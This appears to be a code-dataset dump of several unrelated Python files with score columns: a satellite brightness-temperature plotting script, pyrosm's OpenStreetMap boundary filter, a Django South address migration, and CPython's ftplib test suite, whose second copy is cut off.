bt_mipas_tot = np.empty([0, 142])
for file in files:
#load mipas df
bt_mipas = np.empty([0, 142])
new_file = h5py.File(os.path.join(directory, file), "r")
bt_mipas = new_file["bt"][:]
new_file.close()
bt_mipas_tot = np.vstack([bt_mipas_tot, bt_mipas])
df_bt_mipas = pd.DataFrame(bt_mipas_tot)
mean_bt_mipas = df_bt_mipas.mean()
var_bt_mipas = df_bt_mipas.var()
#plotting variance
my_path = "../progetti/bt_mean_var/"
if not os.path.exists(my_path):
os.makedirs(my_path)
my_file = "var_bt" + ".png"
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax1.plot(np.arange(0,142), var_bt_mipas, label = "mipas")
ax1.plot(np.arange(0,142), var_bt_csdb, label = "csdb")
loc = [84, 99, 107, 113, 125, 131, 137]
new_tick_locations = np.array(loc)
ax2.set_xlim(ax1.get_xlim())
ax2.set_xticks(new_tick_locations)
transition = ["t1", "t2", "t3", "t4", "t5", "t6", "t7"]
ax2.set_xticklabels(transition)
ax2.set_xlabel("transition")
title = ax2.set_title("Variance: BT")
title.set_y(1.1)
fig.subplots_adjust(top=0.85)
ax1.legend()
for tr in loc:
ax1.axvline(tr, linewidth = 1, color = 'k')
ax1.set_ylabel("var")
ax1.set_xlabel("BT")
fig.savefig(os.path.join(my_path, my_file))
plt.close()
#plotting mean
my_file = "mean_bt" + ".png"
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax1.plot(np.arange(0,142), mean_bt_mipas, label = "mipas")
ax1.plot(np.arange(0,142), mean_bt_csdb, label = "csdb")
new_tick_locations = np.array(loc)
ax2.set_xlim(ax1.get_xlim())
ax2.set_xticks(new_tick_locations)
ax2.set_xticklabels(transition)
ax2.set_xlabel("transition")
title = ax2.set_title("Mean: BT")
title.set_y(1.1)
fig.subplots_adjust(top=0.85)
ax1.legend()
for tr in loc:
ax1.axvline(tr, linewidth = 1, color = 'k')
ax1.set_ylabel("mean")
ax1.set_xlabel("BT")
fig.savefig(os.path.join(my_path, my_file))
plt.close()
"""
#btd
new_file = h5py.File("../data/csdb_new/csdb_complete.h5", "r")
btd_csdb = new_file["btd_complete"][:]
new_file.close()
df_btd_csdb = pd.DataFrame(btd_csdb)
mean_btd_csdb = df_btd_csdb.mean()
var_btd_csdb = df_btd_csdb.var()
directory = "../data/mipas_pd"
files = [i for i in os.listdir(directory)]
files = files[19:24]
df_btd_mipas_complete = pd.DataFrame()
for file in files:
#load mipas df
df_btd_mipas = pd.read_hdf(os.path.join(directory, file),'df_btd')
df_btd_mipas_complete = df_btd_mipas_complete.append(df_btd_mipas)
mean_btd_mipas = df_btd_mipas.iloc[:, 0:10011].mean()
var_btd_mipas = df_btd_mipas.iloc[:, 0:10011].var()
plt.plot(np.arange(0,10011), var_btd_mipas, label = "mipas")
plt.plot(np.arange(0,10011), var_btd_csdb, label = "csdb")
"""
| 0.178204 | 0.103749 |
from pyrosm.data_manager import get_osm_data
from pyrosm.frames import prepare_geodataframe
from pyrosm.utils import validate_custom_filter
import geopandas as gpd
import warnings
def get_boundary_data(node_coordinates, way_records, relations,
tags_as_columns, custom_filter,
boundary_type, name, bounding_box):
if boundary_type == "all":
boundary_type = True
else:
boundary_type = [boundary_type]
# If custom_filter has not been defined, initialize with default
if custom_filter is None:
custom_filter = {"boundary": boundary_type}
if "boundary" not in custom_filter.keys():
custom_filter["boundary"] = True
# Check that the custom filter is in correct format
custom_filter = validate_custom_filter(custom_filter)
# Call signature for fetching buildings
nodes, ways, relation_ways, relations = get_osm_data(node_arrays=None,
way_records=way_records,
relations=relations,
tags_as_columns=tags_as_columns,
data_filter=custom_filter,
filter_type="keep",
osm_keys=None
)
# If there weren't any data, return empty GeoDataFrame
if nodes is None and ways is None and relations is None:
warnings.warn("Could not find any boundaries for given area.",
UserWarning,
stacklevel=2)
return None
# Prepare GeoDataFrame
gdf = prepare_geodataframe(nodes, node_coordinates, ways,
relations, relation_ways,
tags_as_columns, bounding_box)
if gdf is None:
return None
# Filter by name
# (use Pandas for filtering, which allows using 'contains' more easily)
if name is not None:
if "name" not in gdf.columns:
raise ValueError("Could not filter by name from given area. "
"Any of the OSM elements did not have a name tag.")
gdf = gdf.dropna(subset=["name"])
gdf = gdf.loc[gdf["name"].str.contains(name)].reset_index(drop=True).copy()
return gdf
|
pyrosm/boundary.py
|
from pyrosm.data_manager import get_osm_data
from pyrosm.frames import prepare_geodataframe
from pyrosm.utils import validate_custom_filter
import geopandas as gpd
import warnings
def get_boundary_data(node_coordinates, way_records, relations,
tags_as_columns, custom_filter,
boundary_type, name, bounding_box):
if boundary_type == "all":
boundary_type = True
else:
boundary_type = [boundary_type]
# If custom_filter has not been defined, initialize with default
if custom_filter is None:
custom_filter = {"boundary": boundary_type}
if "boundary" not in custom_filter.keys():
custom_filter["boundary"] = True
# Check that the custom filter is in correct format
custom_filter = validate_custom_filter(custom_filter)
# Call signature for fetching buildings
nodes, ways, relation_ways, relations = get_osm_data(node_arrays=None,
way_records=way_records,
relations=relations,
tags_as_columns=tags_as_columns,
data_filter=custom_filter,
filter_type="keep",
osm_keys=None
)
# If there weren't any data, return empty GeoDataFrame
if nodes is None and ways is None and relations is None:
warnings.warn("Could not find any boundaries for given area.",
UserWarning,
stacklevel=2)
return None
# Prepare GeoDataFrame
gdf = prepare_geodataframe(nodes, node_coordinates, ways,
relations, relation_ways,
tags_as_columns, bounding_box)
if gdf is None:
return None
# Filter by name
# (use Pandas for filtering, which allows using 'contains' more easily)
if name is not None:
if "name" not in gdf.columns:
raise ValueError("Could not filter by name from given area. "
"Any of the OSM elements did not have a name tag.")
gdf = gdf.dropna(subset=["name"])
gdf = gdf.loc[gdf["name"].str.contains(name)].reset_index(drop=True).copy()
return gdf
| 0.734405 | 0.23688 |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Address.extended_address'
db.add_column(u'address_address', 'extended_address',
self.gf('django.db.models.fields.CharField')(default='', max_length=35, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Address.extended_address'
db.delete_column(u'address_address', 'extended_address')
models = {
u'address.address': {
'Meta': {'ordering': "('locality', 'street_address')", 'object_name': 'Address'},
'extended_address': ('django.db.models.fields.CharField', [], {'max_length': '35', 'blank': 'True'}),
'formatted': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'locality': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'addresses'", 'to': u"orm['address.Locality']"}),
'longitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'street_address': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'address.country': {
'Meta': {'ordering': "('name',)", 'object_name': 'Country'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'blank': 'True'})
},
u'address.locality': {
'Meta': {'ordering': "('state', 'postal_code', 'name')", 'unique_together': "(('name', 'state', 'postal_code'),)", 'object_name': 'Locality'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('address.models.NullCharField', [], {'max_length': '165', 'null': 'True', 'blank': 'True'}),
'postal_code': ('address.models.NullCharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'localities'", 'to': u"orm['address.State']"})
},
u'address.state': {
'Meta': {'ordering': "('country', 'code', 'name')", 'unique_together': "(('name', 'code', 'country'),)", 'object_name': 'State'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'states'", 'to': u"orm['address.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '165', 'blank': 'True'})
}
}
complete_apps = ['address']
|
address/migrations/0004_auto__add_field_address_extended_address__chg_field_address_street_add.py
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Address.extended_address'
db.add_column(u'address_address', 'extended_address',
self.gf('django.db.models.fields.CharField')(default='', max_length=35, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Address.extended_address'
db.delete_column(u'address_address', 'extended_address')
models = {
u'address.address': {
'Meta': {'ordering': "('locality', 'street_address')", 'object_name': 'Address'},
'extended_address': ('django.db.models.fields.CharField', [], {'max_length': '35', 'blank': 'True'}),
'formatted': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'locality': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'addresses'", 'to': u"orm['address.Locality']"}),
'longitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'street_address': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'address.country': {
'Meta': {'ordering': "('name',)", 'object_name': 'Country'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'blank': 'True'})
},
u'address.locality': {
'Meta': {'ordering': "('state', 'postal_code', 'name')", 'unique_together': "(('name', 'state', 'postal_code'),)", 'object_name': 'Locality'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('address.models.NullCharField', [], {'max_length': '165', 'null': 'True', 'blank': 'True'}),
'postal_code': ('address.models.NullCharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'localities'", 'to': u"orm['address.State']"})
},
u'address.state': {
'Meta': {'ordering': "('country', 'code', 'name')", 'unique_together': "(('name', 'code', 'country'),)", 'object_name': 'State'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'states'", 'to': u"orm['address.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '165', 'blank': 'True'})
}
}
complete_apps = ['address']
| 0.443118 | 0.147986 |
# Modified by <NAME>' to test FTP class and IPv6 environment
import ftplib
import threading
import asyncore
import asynchat
import socket
import StringIO
from unittest import TestCase
from test import test_support
from test.test_support import HOST
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024)
def handle_close(self):
self.baseclass.push('226 transfer complete')
self.close()
class DummyFTPHandler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator("\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = ''.join(self.in_buffer)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data + '\r\n')
def cmd_port(self, arg):
addr = map(int, arg.split(','))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=2)
self.dtp = DummyDTPHandler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
sock = socket.socket()
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ',')
p1, p2 = divmod(port, 256)
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = DummyDTPHandler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=2)
self.dtp = DummyDTPHandler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
sock = socket.socket(socket.AF_INET6)
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = DummyDTPHandler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
self.dtp.push(RETR_DATA)
self.dtp.close_when_done()
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accept(self):
conn, addr = self.accept()
self.handler = self.handler(conn)
self.close()
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 1<PASSWORD>'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = StringIO.StringIO(RETR_DATA)
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storlines(self):
f = StringIO.StringIO(RETR_DATA.replace('\r\n', '\n'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
self.client.makeport()
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'pasv')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
self.client.makeport()
self.assertEqual(self.server.handler.last_received_cmd, 'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
self.assertEqual(self.server.handler.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send("1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assert_(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assert_(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
Lib/test/test_ftplib.py
|
# Modified by <NAME>' to test FTP class and IPv6 environment
import ftplib
import threading
import asyncore
import asynchat
import socket
import StringIO
from unittest import TestCase
from test import test_support
from test.test_support import HOST
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024)
def handle_close(self):
self.baseclass.push('226 transfer complete')
self.close()
class DummyFTPHandler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator("\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = ''.join(self.in_buffer)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data + '\r\n')
def cmd_port(self, arg):
addr = map(int, arg.split(','))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=2)
self.dtp = DummyDTPHandler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
sock = socket.socket()
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ',')
p1, p2 = divmod(port, 256)
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = DummyDTPHandler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=2)
self.dtp = DummyDTPHandler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
sock = socket.socket(socket.AF_INET6)
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = DummyDTPHandler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
self.dtp.push(RETR_DATA)
self.dtp.close_when_done()
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accept(self):
conn, addr = self.accept()
self.handler = self.handler(conn)
self.close()
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 1<PASSWORD>'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrlines(self):
received = []
